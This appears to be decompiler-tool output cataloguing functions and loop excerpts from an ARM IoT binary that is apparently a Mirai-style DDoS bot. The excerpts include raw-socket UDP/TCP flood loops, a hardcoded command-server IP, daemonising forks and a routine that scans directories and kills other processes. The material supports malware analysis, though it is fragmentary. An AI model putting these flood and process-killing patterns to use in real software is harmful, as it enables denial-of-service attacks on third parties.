    int32_t fd = sock_fd; // sb
    if (sock_fd == -1) {
    if (setsockopt(SOL_IP, SO_TYPE, option_name, &option_value, (int32_t)&option_len) == -1) {
        return close(fd);
        while (true) {
        while (true) {
            while (true) {
            while (true) {
                                            sendto(fd, (int32_t *)message, 60, MSG_NOSIGNAL, (struct sockaddr *)dest_addr, 16);
                                        sendto(fd, (int32_t *)message, 60, MSG_NOSIGNAL, (struct sockaddr *)dest_addr, 16);
    while (true) {
=================FUNCTION : function_b198 ===================
++++++++ FUNCTION START 17639
++++++++ FUNCTION END 18050
++++++++ FUNCTION LENGTH 411
    struct sockaddr * v117;
    int32_t sock_fd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP); // 0xb298
    int32_t fd = sock_fd; // fp
    if (sock_fd == -1) {
    if (setsockopt(SOL_IP, SO_TYPE, option_name, &option_value, (int32_t)&option_len) == -1) {
        return close(fd);
        while (true) {
        while (true) {
            while (true) {
            while (true) {
                                sendto(fd, (int32_t *)message, v234 + 32, MSG_NOSIGNAL, (struct sockaddr *)dest_addr, 16);
    while (true) {
=================FUNCTION : function_cf04 ===================
++++++++ FUNCTION START 20157
++++++++ FUNCTION END 20684
++++++++ FUNCTION LENGTH 527
    struct sockaddr * v116;
    int32_t sock_fd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP); // 0xd108
    if (sock_fd == -1) {
    if (setsockopt(sock_fd, 0, 3, &option_value, 4) == -1) {
        return close(sock_fd);
        while (true) {
    while (true) {
        while (true) {
        while (true) {
                                        sendto(sock_fd, (int32_t *)message, length, MSG_NOSIGNAL, (struct sockaddr *)dest_addr, 16);
                                    sendto(sock_fd, (int32_t *)message, length, MSG_NOSIGNAL, (struct sockaddr *)dest_addr, 16);
        while (true) {
=================FUNCTION : function_9c74 ===================
++++++++ FUNCTION START 16189
++++++++ FUNCTION END 16679
++++++++ FUNCTION LENGTH 490
    struct sockaddr * v116;
    int32_t sock_fd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP); // 0x9db0
    if (sock_fd == -1) {
    if (setsockopt(sock_fd, 0, 3, &option_value, 4) == -1) {
        return close(sock_fd);
            while (true) {
                while (true) {
                while (true) {
                                        sendto(sock_fd, (int32_t *)message, length, MSG_NOSIGNAL, (struct sockaddr *)(a2 + 24 * option_value), 16);
                                    sendto(sock_fd, (int32_t *)message, length, MSG_NOSIGNAL, (struct sockaddr *)(a2 + 24 * option_value), 16);
            while (true) {
    while (true) {
=================FUNCTION : function_aa7c ===================
++++++++ FUNCTION START 17165
++++++++ FUNCTION END 17636
++++++++ FUNCTION LENGTH 471
    struct sockaddr * v116;
    int32_t sock_fd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP); // 0xabd0
    if (sock_fd == -1) {
    if (setsockopt(sock_fd, 0, 3, &option_value, 4) == -1) {
        return close(sock_fd);
        while (true) {
    while (true) {
        while (true) {
        while (true) {
                                    sendto(sock_fd, (int32_t *)message, v234 + 52, MSG_NOSIGNAL, (struct sockaddr *)(a2 + 24 * option_value), 16);
        while (true) {
=================FUNCTION : function_a300 ===================
++++++++ FUNCTION START 16682
++++++++ FUNCTION END 17162
++++++++ FUNCTION LENGTH 480
    struct sockaddr * v116;
    int32_t sock_fd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP); // 0xa454
    if (sock_fd == -1) {
    if (setsockopt(sock_fd, 0, 3, &option_value, 4) == -1) {
        return close(sock_fd);
        while (true) {
    while (true) {
        while (true) {
        while (true) {
                                    sendto(sock_fd, (int32_t *)message, v234 + 66, MSG_NOSIGNAL, (struct sockaddr *)(a2 + 24 * option_value), 16);
        while (true) {
=================FUNCTION : function_1198c ===================
++++++++ FUNCTION START 32939
++++++++ FUNCTION END 
++++++++ FUNCTION LENGTH 
    struct sockaddr * v117;
                while (true) {
                        while (true) {
                            while (true) {
                while (true) {
                    while (true) {
        while (true) {
    while (true) {
=================FUNCTION : function_117e0 ===================
++++++++ FUNCTION START 31980
++++++++ FUNCTION END 
++++++++ FUNCTION LENGTH 
    struct sockaddr * v117;
    int32_t sock_fd = socket(AF_INET, 0, IPPROTO_IP); // 0x11808
    if (sock_fd != -1) {
        int32_t sock = 2; // bp-40
        connect((int32_t)&sock, (struct sockaddr *)addr, addr);
        getsockname(sock_fd, (struct sockaddr *)&sock, &addr_len);
        close(sock_fd);
=================FUNCTION : function_f2e4 ===================
++++++++ FUNCTION START 24918
++++++++ FUNCTION END 25151
++++++++ FUNCTION LENGTH 233
    struct sockaddr * v113;
    int32_t pid = getpid(); // 0xf2f8
    int32_t v226 = pid ^ getppid();
    int32_t proc_time = clock(); // 0xf310
    int32_t v227 = v226 ^ proc_time;
    int32_t v228 = proc_time;
    return proc_time;
=================FUNCTION : __modsi3 ===================
++++++++ FUNCTION START 34836
++++++++ FUNCTION END 
++++++++ FUNCTION LENGTH 
    struct sockaddr * v117;
            while (true) {
                        while (true) {
                                while (true) {
                    while (true) {
=================FUNCTION : __udivsi3 ===================
++++++++ FUNCTION START 33375
++++++++ FUNCTION END 
++++++++ FUNCTION LENGTH 
    struct sockaddr * v117;
    while (true) {
                                while (true) {
                                    while (true) {
                while (true) {
=================FUNCTION : function_f4f0 ===================
++++++++ FUNCTION START 25689
++++++++ FUNCTION END 25941
++++++++ FUNCTION LENGTH 252
    struct sockaddr * v117;
    if (socket(AF_INET, SOCK_STREAM, IPPROTO_IP) == -1) {
        fcntl(fd, F_GETFL);
        int32_t sock; // 0xf590
        result = connect(sock, (struct sockaddr *)&addr, 16);
=================FUNCTION : function_11908 ===================
++++++++ FUNCTION START 32559
++++++++ FUNCTION END 
++++++++ FUNCTION LENGTH 
    struct sockaddr * v117;
                while (true) {
            while (true) {
            while (true) {
    while (true) {
=================FUNCTION : function_8efc ===================
++++++++ FUNCTION START 13663
++++++++ FUNCTION END 13953
++++++++ FUNCTION LENGTH 290
    struct sockaddr * v116;
    int32_t result = fork(); // 0x8f14
            int32_t status2 = fork(); // 0x8f38
                kill(getppid(), SIGKILL);
                while (true) {
=================FUNCTION : function_ea74 ===================
++++++++ FUNCTION START 23777
++++++++ FUNCTION END 24040
++++++++ FUNCTION LENGTH 263
    struct sockaddr * v116;
    int32_t result = fork(); // 0xea7c
    int32_t fd = open((char *)function_10e78(23, (int32_t *)status), O_RDWR); // 0xead8
        int32_t fd2 = open((char *)function_10e78(24, (int32_t *)status), O_RDWR); // 0xeb34
    while (true) {
=================FUNCTION : __umodsi3 ===================
++++++++ FUNCTION START 34203
++++++++ FUNCTION END 
++++++++ FUNCTION LENGTH 
    struct sockaddr * v117;
            while (true) {
                        while (true) {
                                while (true) {
                    while (true) {
=================FUNCTION : function_9240 ===================
++++++++ FUNCTION START 14605
++++++++ FUNCTION END 14879
++++++++ FUNCTION LENGTH 274
    struct sockaddr * v117;
            return inet_addr((char *)cp);
    while (true) {
        return inet_addr((char *)cp);
=================FUNCTION : function_11654 ===================
++++++++ FUNCTION START 31250
++++++++ FUNCTION END 
++++++++ FUNCTION LENGTH 
    struct sockaddr * v117;
    while (true) {
    while (true) {
    while (true) {
=================FUNCTION : function_1187c ===================
++++++++ FUNCTION START 32230
++++++++ FUNCTION END 
++++++++ FUNCTION LENGTH 
    struct sockaddr * v117;
        while (true) {
    while (true) {
=================FUNCTION : function_11550 ===================
++++++++ FUNCTION START 30197
++++++++ FUNCTION END 
++++++++ FUNCTION LENGTH 
    struct sockaddr * v117;
            while (true) {
    while (true) {
=================FUNCTION : _close ===================
++++++++ FUNCTION START 11233
++++++++ FUNCTION END 11465
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
    return close(fd);
=================FUNCTION : _recvfrom ===================
++++++++ FUNCTION START 3476
++++++++ FUNCTION END 3708
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
    return recvfrom(fd, buf, n, flags, addr, addr_len);
=================FUNCTION : _connect ===================
++++++++ FUNCTION START 1361
++++++++ FUNCTION END 1593
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
    return connect(fd, addr, len);
=================FUNCTION : function_ea20 ===================
++++++++ FUNCTION START 23533
++++++++ FUNCTION END 23774
++++++++ FUNCTION LENGTH 241
    struct sockaddr * v117;
    int32_t v229 = inet_addr("185.33.144.69");
=================FUNCTION : _getpid ===================
++++++++ FUNCTION START 2066
++++++++ FUNCTION END 2298
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
    return getpid();
=================FUNCTION : function_92ac ===================
++++++++ FUNCTION START 14882
++++++++ FUNCTION END 15156
++++++++ FUNCTION LENGTH 274
    struct sockaddr * v117;
    while (true) {
=================FUNCTION : _getppid ===================
++++++++ FUNCTION START 8412
++++++++ FUNCTION END 8644
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
    return getppid();
=================FUNCTION : _inet_addr ===================
++++++++ FUNCTION START 6062
++++++++ FUNCTION END 6294
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
    return inet_addr(cp);
=================FUNCTION : _fork ===================
++++++++ FUNCTION START 7707
++++++++ FUNCTION END 7939
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
    return fork();
=================FUNCTION : _open ===================
++++++++ FUNCTION START 10058
++++++++ FUNCTION END 10290
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
    return open(file, oflag);
=================FUNCTION : _socket ===================
++++++++ FUNCTION START 3711
++++++++ FUNCTION END 3943
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
    return socket(domain, type, protocol);
=================FUNCTION : _recv ===================
++++++++ FUNCTION START 1126
++++++++ FUNCTION END 1358
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
    return recv(fd, buf, n, flags);
=================FUNCTION : _sigprocmask ===================
++++++++ FUNCTION START 11703
++++++++ FUNCTION END 11935
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
    return sigprocmask(how, set, oset);
=================FUNCTION : _setsockopt ===================
++++++++ FUNCTION START 6297
++++++++ FUNCTION END 6529
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
    return setsockopt(fd, level, optname, optval, optlen);
=================FUNCTION : function_11780 ===================
++++++++ FUNCTION START 31717
++++++++ FUNCTION END 
++++++++ FUNCTION LENGTH 
    struct sockaddr * v117;
    while (true) {
=================FUNCTION : function_f40c ===================
++++++++ FUNCTION START 25409
++++++++ FUNCTION END 25686
++++++++ FUNCTION LENGTH 277
    struct sockaddr * v113;
    while (true) {
=================FUNCTION : _kill ===================
++++++++ FUNCTION START 5592
++++++++ FUNCTION END 5824
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
    return kill(pid, sig);
=================FUNCTION : _getsockname ===================
++++++++ FUNCTION START 11938
++++++++ FUNCTION END 12170
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
    return getsockname(fd, addr, len);
=================FUNCTION : function_8e98 ===================
++++++++ FUNCTION START 13396
++++++++ FUNCTION END 13660
++++++++ FUNCTION LENGTH 264
    struct sockaddr * v117;
    while (true) {
=================FUNCTION : _closedir ===================
++++++++ FUNCTION START 10763
++++++++ FUNCTION END 10995
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
    return closedir(dirp);
=================FUNCTION : function_115ec ===================
++++++++ FUNCTION START 30986
++++++++ FUNCTION END 
++++++++ FUNCTION LENGTH 
    struct sockaddr * v117;
    while (true) {
=================FUNCTION : _getsockopt ===================
++++++++ FUNCTION START 9117
++++++++ FUNCTION END 9349
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
    return getsockopt(fd, level, optname, optval, optlen);
=================FUNCTION : _send ===================
++++++++ FUNCTION START 4651
++++++++ FUNCTION END 4883
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
    return send(fd, buf, n, flags);
=================FUNCTION : _sendto ===================
++++++++ FUNCTION START 7237
++++++++ FUNCTION END 7469
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
    return sendto(fd, buf, n, flags, addr, addr_len);
=================FUNCTION : _select ===================
++++++++ FUNCTION START 3946
++++++++ FUNCTION END 4178
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
=================FUNCTION : function_8e54 ===================
++++++++ FUNCTION START 12921
++++++++ FUNCTION END 13154
++++++++ FUNCTION LENGTH 233
    struct sockaddr * v117;
=================FUNCTION : function_8b1c ===================
++++++++ FUNCTION START 413
++++++++ FUNCTION END 653
++++++++ FUNCTION LENGTH 240
    struct sockaddr * v116;
=================FUNCTION : _readlink ===================
++++++++ FUNCTION START 2771
++++++++ FUNCTION END 3003
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
=================FUNCTION : _sleep ===================
++++++++ FUNCTION START 3241
++++++++ FUNCTION END 3473
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
=================FUNCTION : function_10ea4 ===================
++++++++ FUNCTION START 29100
++++++++ FUNCTION END 29372
++++++++ FUNCTION LENGTH 272
    struct sockaddr * v116;
=================FUNCTION : _setsid ===================
++++++++ FUNCTION START 10528
++++++++ FUNCTION END 10760
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
=================FUNCTION : _sigaddset ===================
++++++++ FUNCTION START 4416
++++++++ FUNCTION END 4648
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
=================FUNCTION : * ===================
++++++++ FUNCTION START 9352
++++++++ FUNCTION END 9584
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
    struct sockaddr * v117;
    struct sockaddr * v117;
    struct sockaddr * v117;
    struct sockaddr * v117;
    struct sockaddr * v117;
    struct sockaddr * v117;
=================FUNCTION : function_f340 ===================
++++++++ FUNCTION START 25154
++++++++ FUNCTION END 25406
++++++++ FUNCTION LENGTH 252
    struct sockaddr * v117;
=================FUNCTION : _prctl ===================
++++++++ FUNCTION START 2301
++++++++ FUNCTION END 2533
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
=================FUNCTION : function_8dfc ===================
++++++++ FUNCTION START 12681
++++++++ FUNCTION END 12918
++++++++ FUNCTION LENGTH 237
    struct sockaddr * v117;
=================FUNCTION : _fcntl ===================
++++++++ FUNCTION START 10998
++++++++ FUNCTION END 11230
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
=================FUNCTION : function_11da4 ===================
++++++++ FUNCTION START 36256
++++++++ FUNCTION END 
++++++++ FUNCTION LENGTH 
    struct sockaddr * v117;
=================FUNCTION : _clock ===================
++++++++ FUNCTION START 10293
++++++++ FUNCTION END 10525
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
=================FUNCTION : function_10f5c ===================
++++++++ FUNCTION START 29375
++++++++ FUNCTION END 29647
++++++++ FUNCTION LENGTH 272
    struct sockaddr * v116;
=================FUNCTION : _bind ===================
++++++++ FUNCTION START 5827
++++++++ FUNCTION END 6059
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
=================FUNCTION : function_8d7c ===================
++++++++ FUNCTION START 12173
++++++++ FUNCTION END 12437
++++++++ FUNCTION LENGTH 264
    struct sockaddr * v115;
=================FUNCTION : __start ===================
++++++++ FUNCTION START 13157
++++++++ FUNCTION END 13393
++++++++ FUNCTION LENGTH 236
    struct sockaddr * v117;
=================FUNCTION : function_ea08 ===================
++++++++ FUNCTION START 23298
++++++++ FUNCTION END 23530
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v116;
=================FUNCTION : function_10e78 ===================
++++++++ FUNCTION START 28854
++++++++ FUNCTION END 29097
++++++++ FUNCTION LENGTH 243
    struct sockaddr * v117;
=================FUNCTION : function_11d68 ===================
++++++++ FUNCTION START 35770
++++++++ FUNCTION END 
++++++++ FUNCTION LENGTH 
    struct sockaddr * v116;
=================FUNCTION : function_931c ===================
++++++++ FUNCTION START 15159
++++++++ FUNCTION END 15436
++++++++ FUNCTION LENGTH 277
    struct sockaddr * v115;
=================FUNCTION : _time ===================
++++++++ FUNCTION START 8647
++++++++ FUNCTION END 8879
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
=================FUNCTION : function_8df0 ===================
++++++++ FUNCTION START 12440
++++++++ FUNCTION END 12678
++++++++ FUNCTION LENGTH 238
    struct sockaddr * v117;
=================FUNCTION : ___uClibc_main ===================
++++++++ FUNCTION START 7942
++++++++ FUNCTION END 8174
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
=================FUNCTION : _read ===================
++++++++ FUNCTION START 6767
++++++++ FUNCTION END 6999
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
=================FUNCTION : _ioctl ===================
++++++++ FUNCTION START 891
++++++++ FUNCTION END 1123
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
=================FUNCTION : function_11528 ===================
++++++++ FUNCTION START 29949
++++++++ FUNCTION END 
++++++++ FUNCTION LENGTH 
    struct sockaddr * v117;
=================FUNCTION : _write ===================
++++++++ FUNCTION START 5357
++++++++ FUNCTION END 5589
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
=================FUNCTION : _sigemptyset ===================
++++++++ FUNCTION START 1596
++++++++ FUNCTION END 1828
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
=================FUNCTION : function_ddc4 ===================
++++++++ FUNCTION START 21200
++++++++ FUNCTION END 21471
++++++++ FUNCTION LENGTH 271
    struct sockaddr * v117;
=================FUNCTION : function_f5c4 ===================
++++++++ FUNCTION START 25944
++++++++ FUNCTION END 26229
++++++++ FUNCTION LENGTH 285
    struct sockaddr * v113;
=================FUNCTION : function_11014 ===================
++++++++ FUNCTION START 29650
++++++++ FUNCTION END 
++++++++ FUNCTION LENGTH 
    struct sockaddr * v111;
=================FUNCTION : function_11d9c ===================
++++++++ FUNCTION START 36020
++++++++ FUNCTION END 
++++++++ FUNCTION LENGTH 
    struct sockaddr * v117;
=================FUNCTION : _unlink ===================
++++++++ FUNCTION START 7002
++++++++ FUNCTION END 7234
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
=================FUNCTION : function_f28c ===================
++++++++ FUNCTION START 24677
++++++++ FUNCTION END 24915
++++++++ FUNCTION LENGTH 238
    struct sockaddr * v113;
=================FUNCTION : function_8b04 ===================
++++++++ FUNCTION START 177
++++++++ FUNCTION END 410
++++++++ FUNCTION LENGTH 233
    struct sockaddr * v119 = NULL;
=================FUNCTION : __aeabi_uidivmod ===================
++++++++ FUNCTION START 33968
++++++++ FUNCTION END 
++++++++ FUNCTION LENGTH 
    struct sockaddr * v117;
=================FUNCTION : function_115a4 ===================
++++++++ FUNCTION START 30486
++++++++ FUNCTION END 
++++++++ FUNCTION LENGTH 
    struct sockaddr * v117;
=================FUNCTION : _atoi ===================
++++++++ FUNCTION START 9823
++++++++ FUNCTION END 10055
++++++++ FUNCTION LENGTH 232
    struct sockaddr * v117;
=================FUNCTION : function_de20 ===================
++++++++ FUNCTION START 21474
++++++++ FUNCTION END 21776
++++++++ FUNCTION LENGTH 302
    struct sockaddr * v117;
=================FUNCTION : function_115c8 ===================
++++++++ FUNCTION START 30733
++++++++ FUNCTION END 
++++++++ FUNCTION LENGTH 
    struct sockaddr * v117;
=================FUNCTION : __aeabi_ldiv0 ===================
++++++++ FUNCTION START 35534
++++++++ FUNCTION END 
++++++++ FUNCTION LENGTH 
    struct sockaddr * v117;
================================================================================
========	WHILE LOOPS INTRESTING INSTRUCTIONS : =================================
================================================================================
=============================WHILE LOOPS ID : 3 @ function_8fec ====================================
++++++++ WHILE START : 14248 
++++++++ WHILE FUNCTION : function_8fec 
++++++++ WHILE END : 14463 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		free((int32_t *)v243);
		free((int32_t *)v243);
		free((int32_t *)v243);
		free((int32_t *)v243);
		free((int32_t *)v243);
		free((int32_t *)v243);
=============================WHILE LOOPS ID : 7 @ function_96a4 ====================================
++++++++ WHILE START : 15695 
++++++++ WHILE FUNCTION : function_96a4 
++++++++ WHILE END : 15733 
++++++++ INTRESTING INSTRUCTIONS :  
		int32_t sock_fd = socket(AF_INET, 17, IPPROTO_UDP); // 0x97f4
		if (sock_fd == -1) {
		bind(sock_fd, (struct sockaddr *)&addr, 16);
		int32_t sock; // 0x9898
		connect(sock, (struct sockaddr *)addr2, 16);
=============================WHILE LOOPS ID : 8 @ function_96a4 ====================================
++++++++ WHILE START : 15737 
++++++++ WHILE FUNCTION : function_96a4 
++++++++ WHILE END : 15799 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		int32_t sock2; // 0x9910
		send(sock2, (int32_t *)buf, length, MSG_NOSIGNAL);
		send(sock2, (int32_t *)buf, length, MSG_NOSIGNAL);
		int32_t sock3; // 0x9964
		send(sock3, (int32_t *)buf2, length, MSG_NOSIGNAL);
		send(sock3, (int32_t *)buf2, length, MSG_NOSIGNAL);
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 11 @ function_998c ====================================
++++++++ WHILE START : 16070 
++++++++ WHILE FUNCTION : function_998c 
++++++++ WHILE END : 16108 
++++++++ INTRESTING INSTRUCTIONS :  
		int32_t sock_fd = socket(AF_INET, 0, IPPROTO_IP); // 0x9adc
		if (sock_fd == -1) {
		bind(sock_fd, (struct sockaddr *)&addr, 16);
		int32_t sock; // 0x9b80
		connect(sock, (struct sockaddr *)addr2, 16);
=============================WHILE LOOPS ID : 12 @ function_998c ====================================
++++++++ WHILE START : 16112 
++++++++ WHILE FUNCTION : function_998c 
++++++++ WHILE END : 16174 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		int32_t sock2; // 0x9bf8
		send(sock2, (int32_t *)buf, length, MSG_NOSIGNAL);
		send(sock2, (int32_t *)buf, length, MSG_NOSIGNAL);
		int32_t sock3; // 0x9c4c
		send(sock3, (int32_t *)buf2, length, MSG_NOSIGNAL);
		send(sock3, (int32_t *)buf2, length, MSG_NOSIGNAL);
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 15 @ function_9c74 ====================================
++++++++ WHILE START : 16497 
++++++++ WHILE FUNCTION : function_9c74 
++++++++ WHILE END : 16640 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		sendto(sock_fd, (int32_t *)message, length, MSG_NOSIGNAL, (struct sockaddr *)(a2 + 24 * option_value), 16);
		sendto(sock_fd, (int32_t *)message, length, MSG_NOSIGNAL, (struct sockaddr *)(a2 + 24 * option_value), 16);
=============================WHILE LOOPS ID : 19 @ function_a300 ====================================
++++++++ WHILE START : 17007 
++++++++ WHILE FUNCTION : function_a300 
++++++++ WHILE END : 17161 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		sendto(sock_fd, (int32_t *)message, v234 + 66, MSG_NOSIGNAL, (struct sockaddr *)(a2 + 24 * option_value), 16);
		while (true) {
=============================WHILE LOOPS ID : 21 @ function_aa7c ====================================
++++++++ WHILE START : 17485 
++++++++ WHILE FUNCTION : function_aa7c 
++++++++ WHILE END : 17635 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		sendto(sock_fd, (int32_t *)message, v234 + 52, MSG_NOSIGNAL, (struct sockaddr *)(a2 + 24 * option_value), 16);
		while (true) {
=============================WHILE LOOPS ID : 23 @ function_b198 ====================================
++++++++ WHILE START : 17937 
++++++++ WHILE FUNCTION : function_b198 
++++++++ WHILE END : 18040 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		sendto(fd, (int32_t *)message, v234 + 32, MSG_NOSIGNAL, (struct sockaddr *)dest_addr, 16);
=============================WHILE LOOPS ID : 25 @ function_b65c ====================================
++++++++ WHILE START : 18341 
++++++++ WHILE FUNCTION : function_b65c 
++++++++ WHILE END : 18715 
++++++++ INTRESTING INSTRUCTIONS :  
		result = inet_addr((char *)&cp);
		sock_fd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
		if (sock_fd == -1) {
		if (setsockopt(sock_fd, 0, 3, &option_value, 4) == -1) {
		result2 = close(sock_fd);
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		sendto(sock_fd, (int32_t *)fd, v241 + 47, MSG_NOSIGNAL, (struct sockaddr *)dest_addr, 16);
		result = inet_addr((char *)&cp);
		sock_fd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
		if (sock_fd == -1) {
		if (setsockopt(sock_fd, 0, 3, &option_value, 4) == -1) {
		result2 = close(sock_fd);
		while (true) {
=============================WHILE LOOPS ID : 32 @ function_be0c ====================================
++++++++ WHILE START : 19283 
++++++++ WHILE FUNCTION : function_be0c 
++++++++ WHILE END : 19472 
++++++++ INTRESTING INSTRUCTIONS :  
		int32_t sock_fd2 = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); // 0xc070107
		fd = sock_fd2;
		if (sock_fd2 != -1) {
		while (true) {
		fcntl(sock_fd2, F_GETFL);
		connect(fd, (struct sockaddr *)&addr, 16);
		while (true) {
		int32_t v259 = recvfrom(sock_fd, &buf, 256, MSG_NOSIGNAL, (struct sockaddr *)&addr2, &addr_len); // 0xc1d8
		close(fd);
		close(fd);
		int32_t sock_fd3 = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); // 0xc070
		fd = sock_fd3;
		if (sock_fd3 == -1) {
		sock_fd2 = sock_fd3;
=============================WHILE LOOPS ID : 33 @ function_be0c ====================================
++++++++ WHILE START : 19480 
++++++++ WHILE FUNCTION : function_be0c 
++++++++ WHILE END : 19551 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		sendto(sock_fd, (int32_t *)message, length, MSG_NOSIGNAL, (struct sockaddr *)(24 * option_value + a2), 16);
		sendto(sock_fd, (int32_t *)message, length, MSG_NOSIGNAL, (struct sockaddr *)(24 * option_value + a2), 16);
=============================WHILE LOOPS ID : 35 @ function_c688 ====================================
++++++++ WHILE START : 19860 
++++++++ WHILE FUNCTION : function_c688 
++++++++ WHILE END : 20049 
++++++++ INTRESTING INSTRUCTIONS :  
		int32_t sock_fd2 = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); // 0xc8ec107
		fd = sock_fd2;
		if (sock_fd2 != -1) {
		while (true) {
		fcntl(sock_fd2, F_GETFL);
		connect(fd, (struct sockaddr *)&addr, 16);
		while (true) {
		int32_t v259 = recvfrom(sock_fd, &buf, 256, MSG_NOSIGNAL, (struct sockaddr *)&addr2, &addr_len); // 0xca54
		close(fd);
		close(fd);
		int32_t sock_fd3 = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); // 0xc8ec
		fd = sock_fd3;
		if (sock_fd3 == -1) {
		sock_fd2 = sock_fd3;
=============================WHILE LOOPS ID : 36 @ function_c688 ====================================
++++++++ WHILE START : 20057 
++++++++ WHILE FUNCTION : function_c688 
++++++++ WHILE END : 20128 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		sendto(sock_fd, (int32_t *)message, length, MSG_NOSIGNAL, (struct sockaddr *)(24 * option_value + a2), 16);
		sendto(sock_fd, (int32_t *)message, length, MSG_NOSIGNAL, (struct sockaddr *)(24 * option_value + a2), 16);
=============================WHILE LOOPS ID : 39 @ function_cf04 ====================================
++++++++ WHILE START : 20498 
++++++++ WHILE FUNCTION : function_cf04 
++++++++ WHILE END : 20683 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		sendto(sock_fd, (int32_t *)message, length, MSG_NOSIGNAL, (struct sockaddr *)dest_addr, 16);
		sendto(sock_fd, (int32_t *)message, length, MSG_NOSIGNAL, (struct sockaddr *)dest_addr, 16);
		while (true) {
=============================WHILE LOOPS ID : 41 @ function_d678 ====================================
++++++++ WHILE START : 21005 
++++++++ WHILE FUNCTION : function_d678 
++++++++ WHILE END : 21187 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		sendto(fd, (int32_t *)message, 60, MSG_NOSIGNAL, (struct sockaddr *)dest_addr, 16);
		sendto(fd, (int32_t *)message, 60, MSG_NOSIGNAL, (struct sockaddr *)dest_addr, 16);
=============================WHILE LOOPS ID : 44 @ function_ded0 ====================================
++++++++ WHILE START : 22108 
++++++++ WHILE FUNCTION : function_ded0 
++++++++ WHILE END : 22613 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		close(fd2);
		dirp = opendir((char *)name);
		while (true) {
		while (true) {
		struct __dirstream * dirp2 = opendir((char *)&path); // 0xe284
		while (true) {
		while (true) {
		kill(function_11654((char *)v272, 10), SIGKILL);
		struct dirent * v290 = readdir((struct __dirstream *)dirp3); // 0xe380
		struct dirent * v291 = readdir((struct __dirstream *)dirp3); // 0xe294
		closedir((struct __dirstream *)dirp3);
		v281 = readdir((struct __dirstream *)fd2);
		closedir((struct __dirstream *)dirp4);
		closedir((struct __dirstream *)dirp3);
		v281 = readdir((struct __dirstream *)fd2);
		struct dirent * v301 = readdir((struct __dirstream *)fd2); // 0xe1a0
		closedir((struct __dirstream *)fd2);
		closedir((struct __dirstream *)fd2);
		close(fd2);
		dirp = opendir((char *)name);
		while (true) {
		closedir((struct __dirstream *)fd2);
=============================WHILE LOOPS ID : 46 @ function_e46c ====================================
++++++++ WHILE START : 22935 
++++++++ WHILE FUNCTION : function_e46c 
++++++++ WHILE END : 23291 
++++++++ INTRESTING INSTRUCTIONS :  
		struct __dirstream * v236 = opendir((char *)function_10e78(13, NULL)); // 0xe5f8
		struct dirent * v237 = readdir((struct __dirstream *)dirp); // 0xe63446
		while (true) {
		while (true) {
		int32_t fd2 = open((char *)&path2, O_RDONLY); // 0xe880
		while (true) {
		while (true) {
		close(fd4);
		kill(time_val, SIGKILL);
		v240 = readdir((struct __dirstream *)dirp);
		while (true) {
		close(fd4);
		close(fd4);
		kill(time_val, SIGKILL);
		int32_t pid2 = getpid(); // 0xe818
		int32_t ppid = getppid(); // 0xe824
